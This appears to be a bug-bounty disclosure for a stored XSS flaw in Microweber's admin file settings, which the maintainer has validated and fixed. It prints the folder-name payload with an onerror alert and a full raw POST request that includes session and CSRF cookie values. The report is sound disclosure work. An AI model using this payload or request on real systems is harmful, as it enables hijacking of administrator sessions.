Cross-site Scripting (XSS) - Stored in microweber/microweber

Valid

Reported on

Feb 22nd 2022


Description

I found a Stored XSS vulnerability at admin page: https://demo.microweber.org/demo/admin/view:settings#option_group=files

Proof of Concept

Step 1: Go to Settings > Website settings > Files
Step 2: Create new folder with folder name : <img scr=0 onerror=alert(1)>

// Request
---------------------------------------
POST /demo/api/create_media_dir HTTP/1.1
Host: demo.microweber.org
Cookie: back_to_admin=https%3A//demo.microweber.org/demo/admin/view%3Asettings%23option_group%3Dfiles; csrf-token-data=%7B%22value%22%3A%22CWFoo1r5aSs0Eh43ggbPh7ZrADzLJq9pqxcn2oVo%22%2C%22expiry%22%3A1645524272281%7D; mw-back-to-live-edit=true; show-sidebar-layouts=0; laravel_session=pnfZUavpfYyBW2Nem7BpY0Ove87uyklKnGMAZgpA; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=2%7CRrQ72IHSMWcZZ25VCSQGCbqyg25qhWmSDCJNwDVH4X3Z736hG3mxHR05oNrZ%7C%242y%2410%24114oPbqv.UAg3ca706prIuSTMe3pAc9qYqT2gOBR1uldB9UTk%2FlYu
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 60
Origin: https://demo.microweber.org
Referer: https://demo.microweber.org/demo/admin/view:settings
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

path=&name=%3Cimg+src%3D0+onerror%3Dalert(1)%3E&new_folder=1
---------------------------------------

Step3: After create folder successful, see alert popup

PoC:
Request: https://drive.google.com/file/d/1daorHwquywP3LPh6na5PIZzWb2lEL19W/view?usp=sharing
Alert popup: https://drive.google.com/file/d/1iTtAwQNHrpfktGHHXDrJ_7XPYlBOAHxe/view?usp=sharing

Impact

This vulnerability is capable of stored XSS

We are processing your report and will contact the microweber team within 24 hours. 3 months ago
We have contacted a member of the microweber team and are waiting to hear back 3 months ago
Bozhidar Slaveykov validated this vulnerability 3 months ago
Andy has been awarded the disclosure bounty
The fix bounty is now up for grabs
Bozhidar Slaveykov confirmed that a fix has been merged on c897d0 3 months ago
Bozhidar Slaveykov has been awarded the fix bounty
to join this conversation